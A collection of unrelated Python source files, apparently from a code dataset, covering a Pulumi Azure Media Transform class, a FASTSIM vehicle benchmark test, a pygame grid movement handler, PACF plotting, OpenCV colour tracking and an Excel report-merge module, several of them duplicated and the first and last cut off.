__props__.__dict__["resource_group_name"] = resource_group_name super(Transform, __self__).__init__( 'azure:media/transform:Transform', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, description: Optional[pulumi.Input[str]] = None, media_services_account_name: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None, resource_group_name: Optional[pulumi.Input[str]] = None) -> 'Transform': """ Get an existing Transform resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] description: An optional verbose description of the Transform. :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created. :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined. :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)) __props__ = _TransformState.__new__(_TransformState) __props__.__dict__["description"] = description __props__.__dict__["media_services_account_name"] = media_services_account_name __props__.__dict__["name"] = name __props__.__dict__["outputs"] = outputs __props__.__dict__["resource_group_name"] = resource_group_name return Transform(resource_name, opts=opts, __props__=__props__) @property @pulumi.getter def description(self) -> pulumi.Output[Optional[str]]: """ An optional verbose description of the Transform. """ return pulumi.get(self, "description") @property @pulumi.getter(name="mediaServicesAccountName") def media_services_account_name(self) -> pulumi.Output[str]: """ The Media Services account name. Changing this forces a new Transform to be created. """ return pulumi.get(self, "media_services_account_name") @property @pulumi.getter def name(self) -> pulumi.Output[str]: """ The name which should be used for this Transform. Changing this forces a new Transform to be created. """ return pulumi.get(self, "name") @property @pulumi.getter def outputs(self) -> pulumi.Output[Optional[Sequence['outputs.TransformOutput']]]: """ One or more `output` blocks as defined below. At least one `output` must be defined. """ return pulumi.get(self, "outputs") @property @pulumi.getter(name="resourceGroupName") def resource_group_name(self) -> pulumi.Output[str]: """ The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created. """ return pulumi.get(self, "resource_group_name")
0.85753
0.095307
import pandas as pd import time import numpy as np import re import os import sys import inspect from pathlib import Path # local modules from fastsim import simdrive, vehicle, cycle def main(use_jitclass=True, err_tol=1e-4): """Runs test test for 26 vehicles and 3 cycles. Test compares cumulative positive and negative energy values to a benchmark from earlier. Arguments: ---------- use_jitclass : use numba or not, default True err_tol : error tolerance default of 1e-4 was selected to prevent minor errors from showing. As of 31 December 2020, a recent python update caused errors that are smaller than this and therefore ok to neglect. """ t0 = time.time() cycles = ['udds', 'hwfet', 'us06'] vehicles = np.arange(1, 27) print('Instantiating classes.') print() veh = vehicle.Vehicle(1) if use_jitclass: veh_jit = veh.get_numba_veh() cyc = cycle.Cycle('udds') if use_jitclass: cyc_jit = cyc.get_numba_cyc() energyAuditErrors = [] iter = 0 for vehno in vehicles: print('vehno =', vehno) for cycname in cycles: if not((vehno == 1) and (cycname == 'udds')): cyc.set_standard_cycle(cycname) if use_jitclass: cyc_jit = cyc.get_numba_cyc() veh.load_veh(vehno) if use_jitclass: veh_jit = veh.get_numba_veh() if use_jitclass: sim_drive = simdrive.SimDriveJit(cyc_jit, veh_jit) sim_drive.sim_drive() else: sim_drive = simdrive.SimDriveClassic(cyc, veh) sim_drive.sim_drive() sim_drive_post = simdrive.SimDrivePost(sim_drive) # sim_drive_post.set_battery_wear() diagno = sim_drive_post.get_diagnostics() energyAuditErrors.append(sim_drive.energyAuditError) if iter == 0: dict_diag = {} dict_diag['vnum'] = [vehno] dict_diag['cycle'] = [cycname] for key in diagno.keys(): dict_diag[key] = [diagno[key]] iter += 1 else: dict_diag['vnum'].append(vehno) dict_diag['cycle'].append(cycname) for key in diagno.keys(): dict_diag[key].append(diagno[key]) df = pd.DataFrame.from_dict(dict_diag) t1 = time.time() print() print('Elapsed time: ', round(t1 - t0, 2), 's') df0 = pd.read_csv(Path(simdrive.__file__).parent.resolve() / 'resources/master_benchmark_vars.csv') # make sure both dataframes have the same columns new_cols = {col for col in df.columns} - {col for col in df0.columns} df.drop(columns=new_cols, inplace=True) old_cols = {col for col in df0.columns} - {col for col in df.columns} df0.drop(columns=old_cols, inplace=True) from math import isclose df_err = df.copy() abs_err = [] for idx in df.index: for col in df.columns[2:]: if not(isclose(df.loc[idx, col], df0.loc[idx, col], rel_tol=err_tol, abs_tol=err_tol)): df_err.loc[idx, col] = (df.loc[idx, col] - df0.loc[idx, col]) / df0.loc[idx, col] abs_err.append(np.abs(df_err.loc[idx, col])) print(str(round(df_err.loc[idx, col] * 100, 5)) + '% for') print('New Value: ' + str(round(df.loc[idx, col], 15))) print('vnum = ' + str(df.loc[idx, 'vnum'])) print('cycle = ' + str(df.loc[idx, 'cycle'])) print('idx =', idx, ', col =', col) print() else: df_err.loc[idx, col] = 0 abs_err = np.array(abs_err) if len(abs_err) > 0: print('\nmax error =', str(round(abs_err.max() * 100, 4)) + '%') else: print(f'No errors exceed the {err_tol:.3g} tolerance threshold.') if __name__ == "__main__": if len(sys.argv) > 1: if re.match('(?i)true', sys.argv[1]): use_jitclass = True print('Using numba JIT compilation.') else: use_jitclass = False print('Skipping numba JIT compilation.') if len(sys.argv) > 2: err_tol = float(sys.argv[2]) print(f"Using error tolerance of {err_tol:.3g}.") else: err_tol = list(inspect.signature(main).parameters.values())[1].default print(f"Using error default tolerance of {err_tol:.3g}.") main(use_jitclass=use_jitclass, err_tol=err_tol) else: print('Using numba JIT compilation.') main()
fastsim-2021a/fastsim/tests/test26veh3cyc.py
import pandas as pd import time import numpy as np import re import os import sys import inspect from pathlib import Path # local modules from fastsim import simdrive, vehicle, cycle def main(use_jitclass=True, err_tol=1e-4): """Runs test test for 26 vehicles and 3 cycles. Test compares cumulative positive and negative energy values to a benchmark from earlier. Arguments: ---------- use_jitclass : use numba or not, default True err_tol : error tolerance default of 1e-4 was selected to prevent minor errors from showing. As of 31 December 2020, a recent python update caused errors that are smaller than this and therefore ok to neglect. """ t0 = time.time() cycles = ['udds', 'hwfet', 'us06'] vehicles = np.arange(1, 27) print('Instantiating classes.') print() veh = vehicle.Vehicle(1) if use_jitclass: veh_jit = veh.get_numba_veh() cyc = cycle.Cycle('udds') if use_jitclass: cyc_jit = cyc.get_numba_cyc() energyAuditErrors = [] iter = 0 for vehno in vehicles: print('vehno =', vehno) for cycname in cycles: if not((vehno == 1) and (cycname == 'udds')): cyc.set_standard_cycle(cycname) if use_jitclass: cyc_jit = cyc.get_numba_cyc() veh.load_veh(vehno) if use_jitclass: veh_jit = veh.get_numba_veh() if use_jitclass: sim_drive = simdrive.SimDriveJit(cyc_jit, veh_jit) sim_drive.sim_drive() else: sim_drive = simdrive.SimDriveClassic(cyc, veh) sim_drive.sim_drive() sim_drive_post = simdrive.SimDrivePost(sim_drive) # sim_drive_post.set_battery_wear() diagno = sim_drive_post.get_diagnostics() energyAuditErrors.append(sim_drive.energyAuditError) if iter == 0: dict_diag = {} dict_diag['vnum'] = [vehno] dict_diag['cycle'] = [cycname] for key in diagno.keys(): dict_diag[key] = [diagno[key]] iter += 1 else: dict_diag['vnum'].append(vehno) dict_diag['cycle'].append(cycname) for key in diagno.keys(): dict_diag[key].append(diagno[key]) df = pd.DataFrame.from_dict(dict_diag) t1 = time.time() print() print('Elapsed time: ', round(t1 - t0, 2), 's') df0 = pd.read_csv(Path(simdrive.__file__).parent.resolve() / 'resources/master_benchmark_vars.csv') # make sure both dataframes have the same columns new_cols = {col for col in df.columns} - {col for col in df0.columns} df.drop(columns=new_cols, inplace=True) old_cols = {col for col in df0.columns} - {col for col in df.columns} df0.drop(columns=old_cols, inplace=True) from math import isclose df_err = df.copy() abs_err = [] for idx in df.index: for col in df.columns[2:]: if not(isclose(df.loc[idx, col], df0.loc[idx, col], rel_tol=err_tol, abs_tol=err_tol)): df_err.loc[idx, col] = (df.loc[idx, col] - df0.loc[idx, col]) / df0.loc[idx, col] abs_err.append(np.abs(df_err.loc[idx, col])) print(str(round(df_err.loc[idx, col] * 100, 5)) + '% for') print('New Value: ' + str(round(df.loc[idx, col], 15))) print('vnum = ' + str(df.loc[idx, 'vnum'])) print('cycle = ' + str(df.loc[idx, 'cycle'])) print('idx =', idx, ', col =', col) print() else: df_err.loc[idx, col] = 0 abs_err = np.array(abs_err) if len(abs_err) > 0: print('\nmax error =', str(round(abs_err.max() * 100, 4)) + '%') else: print(f'No errors exceed the {err_tol:.3g} tolerance threshold.') if __name__ == "__main__": if len(sys.argv) > 1: if re.match('(?i)true', sys.argv[1]): use_jitclass = True print('Using numba JIT compilation.') else: use_jitclass = False print('Skipping numba JIT compilation.') if len(sys.argv) > 2: err_tol = float(sys.argv[2]) print(f"Using error tolerance of {err_tol:.3g}.") else: err_tol = list(inspect.signature(main).parameters.values())[1].default print(f"Using error default tolerance of {err_tol:.3g}.") main(use_jitclass=use_jitclass, err_tol=err_tol) else: print('Using numba JIT compilation.') main()
0.313735
0.341912
import pygame from ..base import Manual from ...enums import Effects class ManualSquare(Manual): inputs = { 'up': pygame.key.key_code('Z'), 'left': pygame.key.key_code('Q'), 'down': pygame.key.key_code('S'), 'right': pygame.key.key_code('D'), } def run_one_step(self, key) -> None: if not key: return if key == self.inputs['up']: # Go up self.move_character(0) elif key == self.inputs['left']: # Go left self.move_character(1) elif key == self.inputs['down']: # Go down self.move_character(2) elif key == self.inputs['right']: # Go right self.move_character(3) def move_character(self, direction: int, amount: int = 1) -> None: """ Changes the position of the character by `amount` cell(s) on a squared grid. :param int direction: Direction the character should move to. Mapping: 0: up 1: left 2: down 3: right :param int amount: How many cells it will try to move. Default is 1. """ if direction not in range(4): raise ValueError(f'Invalid direction {direction!r}, should be an integer between 0 and 3 included.') new_x, new_y = self.character.location for _ in range(amount): if direction == 0: new_y -= 1 elif direction == 1: new_x -= 1 elif direction == 2: new_y += 1 elif direction == 3: new_x += 1 # Check if new coords are in the available space max_x, max_y = self.level.content.shape if 0 <= new_x < max_x and 0 <= new_y < max_y: # Get the object which is on our path next_step_cell_object_id = self.level.content[new_x, new_y] next_step_cell_object = self.objects[next_step_cell_object_id - 1] if next_step_cell_object.traversable: self.character.move_and_handle_object_effect(new_x, new_y, next_step_cell_object) if next_step_cell_object.effect == Effects.LEVEL_FINISH: self._running = False # If the character is dead, end. if not self.character.is_alive(): self._running = False
leveltwo/algorithm/square/manual.py
import pygame from ..base import Manual from ...enums import Effects class ManualSquare(Manual): inputs = { 'up': pygame.key.key_code('Z'), 'left': pygame.key.key_code('Q'), 'down': pygame.key.key_code('S'), 'right': pygame.key.key_code('D'), } def run_one_step(self, key) -> None: if not key: return if key == self.inputs['up']: # Go up self.move_character(0) elif key == self.inputs['left']: # Go left self.move_character(1) elif key == self.inputs['down']: # Go down self.move_character(2) elif key == self.inputs['right']: # Go right self.move_character(3) def move_character(self, direction: int, amount: int = 1) -> None: """ Changes the position of the character by `amount` cell(s) on a squared grid. :param int direction: Direction the character should move to. Mapping: 0: up 1: left 2: down 3: right :param int amount: How many cells it will try to move. Default is 1. """ if direction not in range(4): raise ValueError(f'Invalid direction {direction!r}, should be an integer between 0 and 3 included.') new_x, new_y = self.character.location for _ in range(amount): if direction == 0: new_y -= 1 elif direction == 1: new_x -= 1 elif direction == 2: new_y += 1 elif direction == 3: new_x += 1 # Check if new coords are in the available space max_x, max_y = self.level.content.shape if 0 <= new_x < max_x and 0 <= new_y < max_y: # Get the object which is on our path next_step_cell_object_id = self.level.content[new_x, new_y] next_step_cell_object = self.objects[next_step_cell_object_id - 1] if next_step_cell_object.traversable: self.character.move_and_handle_object_effect(new_x, new_y, next_step_cell_object) if next_step_cell_object.effect == Effects.LEVEL_FINISH: self._running = False # If the character is dead, end. if not self.character.is_alive(): self._running = False
0.810854
0.285602
import matplotlib.pyplot as plt plt.rcParams['font.size']=6 import os root_path = os.path.dirname(os.path.abspath('__file__')) # root_path = os.path.abspath(os.path.join(root_path,os.path.pardir)) graphs_path = root_path+'/results_analysis/graphs/' import sys sys.path.append(root_path) from plot_pacfs import plot_pacf,plot_pacfs if __name__ == "__main__": # plot_pacf( # pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/huaxian-vmd-pacf.eps', # ) plot_pacfs( pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', save_path=graphs_path+'/huaxian-vmd-pacf.tif', format='TIFF', dpi=600, ) plot_pacf( pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', save_path=graphs_path+'/huaxian-vmd-imf1-pacf.tif', subsignal_id=1, format='TIFF', dpi=1200, ) # plot_pacf( # pacf_path=root_path+'/Xianyang_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Xianyang_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Xianyang_vmd/data/lo_bounds20.csv', # save_path = graphs_path+'/xianyang-vmd-pacf.eps' # ) # plot_pacf( # pacf_path=root_path+'/Xianyang_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Xianyang_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Xianyang_vmd/data/lo_bounds20.csv', # save_path = graphs_path+'/xianyang-vmd-pacf.tif', # format='TIFF', # dpi=1000, # ) # plot_pacf( # pacf_path=root_path+'/Zhangjiashan_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Zhangjiashan_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Zhangjiashan_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/Zhangjiashan_vmd-pacf.eps' # ) # plot_pacf( # pacf_path=root_path+'/Zhangjiashan_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Zhangjiashan_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Zhangjiashan_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/Zhangjiashan_vmd-pacf.tif', # format='TIFF', # dpi=1000, # )
results_analysis/plot_pacf_for_all.py
import matplotlib.pyplot as plt plt.rcParams['font.size']=6 import os root_path = os.path.dirname(os.path.abspath('__file__')) # root_path = os.path.abspath(os.path.join(root_path,os.path.pardir)) graphs_path = root_path+'/results_analysis/graphs/' import sys sys.path.append(root_path) from plot_pacfs import plot_pacf,plot_pacfs if __name__ == "__main__": # plot_pacf( # pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/huaxian-vmd-pacf.eps', # ) plot_pacfs( pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', save_path=graphs_path+'/huaxian-vmd-pacf.tif', format='TIFF', dpi=600, ) plot_pacf( pacf_path=root_path+'/Huaxian_vmd/data/pacfs20.csv', up_bound_path=root_path+'/Huaxian_vmd/data/up_bounds20.csv', low_bound_path=root_path+'/Huaxian_vmd/data/lo_bounds20.csv', save_path=graphs_path+'/huaxian-vmd-imf1-pacf.tif', subsignal_id=1, format='TIFF', dpi=1200, ) # plot_pacf( # pacf_path=root_path+'/Xianyang_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Xianyang_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Xianyang_vmd/data/lo_bounds20.csv', # save_path = graphs_path+'/xianyang-vmd-pacf.eps' # ) # plot_pacf( # pacf_path=root_path+'/Xianyang_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Xianyang_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Xianyang_vmd/data/lo_bounds20.csv', # save_path = graphs_path+'/xianyang-vmd-pacf.tif', # format='TIFF', # dpi=1000, # ) # plot_pacf( # pacf_path=root_path+'/Zhangjiashan_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Zhangjiashan_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Zhangjiashan_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/Zhangjiashan_vmd-pacf.eps' # ) # plot_pacf( # pacf_path=root_path+'/Zhangjiashan_vmd/data/pacfs20.csv', # up_bound_path=root_path+'/Zhangjiashan_vmd/data/up_bounds20.csv', # low_bound_path=root_path+'/Zhangjiashan_vmd/data/lo_bounds20.csv', # save_path=graphs_path+'/Zhangjiashan_vmd-pacf.tif', # format='TIFF', # dpi=1000, # )
0.238107
0.148541
import numpy as np import cv2 import argparse from collections import deque import time from pynput.keyboard import Key, Controller class CameraCapture(): def __init__(self): self.cap = cv2.VideoCapture(0) self.Lower_green = np.array([110,50,50]) self.Upper_green = np.array([130,255,255]) self.pts = deque(maxlen=64) self.img = None self.mask = None self.res = None def visualize_trace(self): for i in range (1,len(self.pts)): if self.pts[i-1]is None or self.pts[i] is None: continue thick = int(np.sqrt(len(self.pts) / float(i + 1)) * 2.5) cv2.line(self.img, self.pts[i-1],self.pts[i],(0,0,225),thick) def visualize_frame(self): self.img = cv2.flip(self.img, 1) cv2.imshow("Frame", self.img) # cv2.imshow("mask", self.mask) # cv2.imshow("res", self.res) def cleanup(self): self.cap.release() cv2.destroyAllWindows() def capture_one_fram(self): ret, self.img=self.cap.read() hsv=cv2.cvtColor(self.img,cv2.COLOR_BGR2HSV) kernel=np.ones((5,5),np.uint8) self.mask=cv2.inRange(hsv,self.Lower_green,self.Upper_green) self.mask = cv2.erode(self.mask, kernel, iterations=2) self.mask=cv2.morphologyEx(self.mask,cv2.MORPH_OPEN,kernel) #mask=cv2.morphologyEx(mask,cv2.MORPH_CLOSE,kernel) self.mask = cv2.dilate(self.mask, kernel, iterations=1) self.res=cv2.bitwise_and(self.img,self.img,mask=self.mask) cnts,heir=cv2.findContours(self.mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2:] center = None x, y = -1, -1 if len(cnts) > 0: c = max(cnts, key=cv2.contourArea) ((x, y), radius) = cv2.minEnclosingCircle(c) M = cv2.moments(c) center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"])) print(x, y) if radius > 5: cv2.circle(self.img, (int(x), int(y)), int(radius),(0, 255, 255), 2) cv2.circle(self.img, center, 5, (0, 0, 255), -1) # self.visualize_trace() print(x, y) self.pts.appendleft(center) self.visualize_trace() return x,y class MoveFinder(CameraCapture): def __init__(self): super().__init__() self.consecutive_three = deque(maxlen=3) self.start_pos = (0, 0) self.end_pos = (0, 0) if __name__ == '__main__': cam = CameraCapture() while True: cam.capture_one_fram() # cam.visualize_trace() cam.visualize_frame() k = cv2.waitKey(ord('p')) & 0xFF if k == ord('p'): break cam.cleanup()
new_try.py
import numpy as np import cv2 import argparse from collections import deque import time from pynput.keyboard import Key, Controller class CameraCapture(): def __init__(self): self.cap = cv2.VideoCapture(0) self.Lower_green = np.array([110,50,50]) self.Upper_green = np.array([130,255,255]) self.pts = deque(maxlen=64) self.img = None self.mask = None self.res = None def visualize_trace(self): for i in range (1,len(self.pts)): if self.pts[i-1]is None or self.pts[i] is None: continue thick = int(np.sqrt(len(self.pts) / float(i + 1)) * 2.5) cv2.line(self.img, self.pts[i-1],self.pts[i],(0,0,225),thick) def visualize_frame(self): self.img = cv2.flip(self.img, 1) cv2.imshow("Frame", self.img) # cv2.imshow("mask", self.mask) # cv2.imshow("res", self.res) def cleanup(self): self.cap.release() cv2.destroyAllWindows() def capture_one_fram(self): ret, self.img=self.cap.read() hsv=cv2.cvtColor(self.img,cv2.COLOR_BGR2HSV) kernel=np.ones((5,5),np.uint8) self.mask=cv2.inRange(hsv,self.Lower_green,self.Upper_green) self.mask = cv2.erode(self.mask, kernel, iterations=2) self.mask=cv2.morphologyEx(self.mask,cv2.MORPH_OPEN,kernel) #mask=cv2.morphologyEx(mask,cv2.MORPH_CLOSE,kernel) self.mask = cv2.dilate(self.mask, kernel, iterations=1) self.res=cv2.bitwise_and(self.img,self.img,mask=self.mask) cnts,heir=cv2.findContours(self.mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)[-2:] center = None x, y = -1, -1 if len(cnts) > 0: c = max(cnts, key=cv2.contourArea) ((x, y), radius) = cv2.minEnclosingCircle(c) M = cv2.moments(c) center = (int(M["m10"] / M["m00"]), int(M["m01"] / M["m00"])) print(x, y) if radius > 5: cv2.circle(self.img, (int(x), int(y)), int(radius),(0, 255, 255), 2) cv2.circle(self.img, center, 5, (0, 0, 255), -1) # self.visualize_trace() print(x, y) self.pts.appendleft(center) self.visualize_trace() return x,y class MoveFinder(CameraCapture): def __init__(self): super().__init__() self.consecutive_three = deque(maxlen=3) self.start_pos = (0, 0) self.end_pos = (0, 0) if __name__ == '__main__': cam = CameraCapture() while True: cam.capture_one_fram() # cam.visualize_trace() cam.visualize_frame() k = cv2.waitKey(ord('p')) & 0xFF if k == ord('p'): break cam.cleanup()
0.392919
0.200088
import glob import os from datetime import datetime from enum import IntEnum, auto from logging import Logger from typing import Final, Optional, Union import openpyxl import pandas as pd import python_lib_for_me as pyl from openpyxl.worksheet.worksheet import Worksheet from styleframe import StyleFrame, Styler, utils from fgo_farm_report_collection.util import const_util, pandas_util class EnumOfProc(IntEnum): GENERATE_LIST = auto() GENERATE_USER_TOTAL_SUMMARY = auto() GENERATE_QUEST_TOTAL_SUMMARY = auto() GENERATE_INDIVIDUAL_SUMMARY = auto() def do_logic_that_merge_list( append_sheet: bool ) -> None: '''ロジック(周回報告一覧マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告一覧マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_LIST, const_util.FARM_REPORT_LIST_FILE_PATH, const_util.FARM_REPORT_LIST_HEADER, append_sheet, const_util.FARM_REPORT_LIST_MERGE_RESULT_FILE_PATH, '周回報告一覧', { const_util.FARM_REPORT_LIST_HEADER[0]: 20, const_util.FARM_REPORT_LIST_HEADER[1]: 20, const_util.FARM_REPORT_LIST_HEADER[2]: 14, const_util.FARM_REPORT_LIST_HEADER[3]: 25, const_util.FARM_REPORT_LIST_HEADER[4]: 20, const_util.FARM_REPORT_LIST_HEADER[5]: 10, const_util.FARM_REPORT_LIST_HEADER[6]: 200, }, 'A4', ['A1:G1', 'A2:G2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告一覧マージを終了します。') return None def do_logic_that_merge_yearly_usr_tot_sum( append_sheet: bool ) -> None: '''ロジック(周回報告年間ユーザ全体概要マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告年間ユーザ全体概要マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_USER_TOTAL_SUMMARY, const_util.FARM_REPORT_YEARLY_USR_TOT_SUM_FILE_PATH, const_util.FARM_REPORT_USR_TOT_SUM_HEADER, append_sheet, const_util.FARM_REPORT_YEARLY_USR_TOT_SUM_MERGE_RESULT_FILE_PATH, 'クエスト種別ごとの年間周回数(ユーザ編)', { const_util.FARM_REPORT_USR_TOT_SUM_HEADER[0]: 20, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[1]: 20, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[2]: 10, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[3]: 10, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[4]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[5]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[6]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[7]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[8]: 15, }, 'A4', ['A1:I1', 'A2:I2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告年間ユーザ全体概要マージを終了します。') return None def do_logic_that_merge_yearly_qst_tot_sum( append_sheet: bool ) -> None: '''ロジック(周回報告年間クエスト全体概要マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告年間クエスト全体概要マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY, const_util.FARM_REPORT_YEARLY_QST_TOT_SUM_FILE_PATH, const_util.FARM_REPORT_QST_TOT_SUM_HEADER, append_sheet, const_util.FARM_REPORT_YEARLY_QST_TOT_SUM_MERGE_RESULT_FILE_PATH, 'クエスト種別ごとの年間周回数(クエスト編)', { const_util.FARM_REPORT_QST_TOT_SUM_HEADER[0]: 20, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[1]: 20, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[2]: 10, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[3]: 10, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[4]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[5]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[6]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[7]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[8]: 15, }, 'A4', ['A1:I1', 'A2:I2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告年間クエスト全体概要マージを終了します。') return None def do_logic_that_merge_monthly_usr_tot_sum( append_sheet: bool ) -> None: '''ロジック(周回報告月間ユーザ全体概要マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告月間ユーザ全体概要マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_USER_TOTAL_SUMMARY, const_util.FARM_REPORT_MONTHLY_USR_TOT_SUM_FILE_PATH, const_util.FARM_REPORT_USR_TOT_SUM_HEADER, append_sheet, const_util.FARM_REPORT_MONTHLY_USR_TOT_SUM_MERGE_RESULT_FILE_PATH, 'クエスト種別ごとの月間周回数(ユーザ編)', { const_util.FARM_REPORT_USR_TOT_SUM_HEADER[0]: 20, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[1]: 20, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[2]: 10, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[3]: 10, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[4]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[5]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[6]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[7]: 13, const_util.FARM_REPORT_USR_TOT_SUM_HEADER[8]: 15, }, 'A4', ['A1:I1', 'A2:I2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告月間ユーザ全体概要マージを終了します。') return None def do_logic_that_merge_monthly_qst_tot_sum( append_sheet: bool ) -> None: '''ロジック(周回報告月間クエスト全体概要マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告月間クエスト全体概要マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_QUEST_TOTAL_SUMMARY, const_util.FARM_REPORT_MONTHLY_QST_TOT_SUM_FILE_PATH, const_util.FARM_REPORT_QST_TOT_SUM_HEADER, append_sheet, const_util.FARM_REPORT_MONTHLY_QST_TOT_SUM_MERGE_RESULT_FILE_PATH, 'クエスト種別ごとの月間周回数(クエスト編)', { const_util.FARM_REPORT_QST_TOT_SUM_HEADER[0]: 20, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[1]: 20, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[2]: 10, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[3]: 10, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[4]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[5]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[6]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[7]: 13, const_util.FARM_REPORT_QST_TOT_SUM_HEADER[8]: 15, }, 'A4', ['A1:I1', 'A2:I2'] ) except Exception as e: raise(e) finally: pyl.log_inf(lg, f'周回報告月間クエスト全体概要マージを終了します。') return None def do_logic_that_merge_ind_sum( append_sheet: bool ) -> None: '''ロジック(周回報告個人概要マージ)実行''' lg: Optional[Logger] = None try: # ロガーの取得 lg = pyl.get_logger(__name__) pyl.log_inf(lg, f'周回報告個人概要マージを開始します。') __do_logic_that_merge_gen_result( EnumOfProc.GENERATE_INDIVIDUAL_SUMMARY, const_util.FARM_REPORT_IND_SUM_FILE_PATH, const_util.FARM_REPORT_IND_SUM_HEADER, append_sheet, const_util.FARM_REPORT_IND_SUM_MERGE_RESULT_FILE_PATH, 'ユーザごとの周回数', { const_util.FARM_REPORT_IND_SUM_HEADER[0]: 10, const_util.FARM_REPORT_IND_SUM_HEADER[1]: 17, const_util.FARM_REPORT_IND_SUM_HEADER[2]: 